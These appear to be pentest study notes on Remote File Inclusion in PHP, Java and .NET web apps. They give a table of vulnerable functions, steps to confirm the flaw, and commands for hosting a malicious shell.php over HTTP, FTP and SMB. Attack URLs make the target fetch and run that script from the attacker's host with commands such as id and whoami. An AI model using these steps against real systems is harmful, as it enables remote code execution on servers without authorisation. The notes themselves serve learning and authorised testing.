RFI

https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
2 main benefits:
1. Enumerating local-only ports and web applications (i.e. SSRF)
2. Gaining remote code execution by including a malicious script that we host

Remote File Inclusion
When a vulnerable function allows us to include remote files, we may be able to host a malicious script, and then include it in the vulnerable page to execute malicious functions and gain remote code execution.

Function	Read Content	Execute	Remote URL
PHP
`include()`/`include_once()`	✅	✅	✅
`file_get_contents()`	✅	❌	✅
Java
`import`	✅	✅	✅
.NET
`@Html.RemotePartial()`	✅	❌	✅
`include`	✅	✅	✅
### Verify RFI
- Check for `allow_include_url` from PHP Wrappers.
- Then, include a URL in the parameter that is vulnerable.
- eg: `http://SERVER:PORT/index.php?language=http://127.0.0.1/index.php`
- If this works, then the page is vulnerable to RFI
- Also notice that the page got included and the source code was not displayed.
- This means, the code is being executed. This can be used to include a malicious PHP script that we host on our machine.
-
## Remote Code Execution with RFI
-
- create the malicious script.
- Now host the script on known ports like 80, 443, 21, 138/445.
### Hosting on HTTP:
- `sudo python3 -m http.server 80`
- `http://SERVER:PORT/index.php?language=http://OUR_IP/shell.php?cmd=id`
-
### Hosting on FTP:
- `sudo python -m pyftpdlib -p 21`
- `http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id`
- If credentials are required to access the ftp server:
- `http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id`

impacket-smbserver smb2support share /tmp/smbshare
provide the UNC path in the URL
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami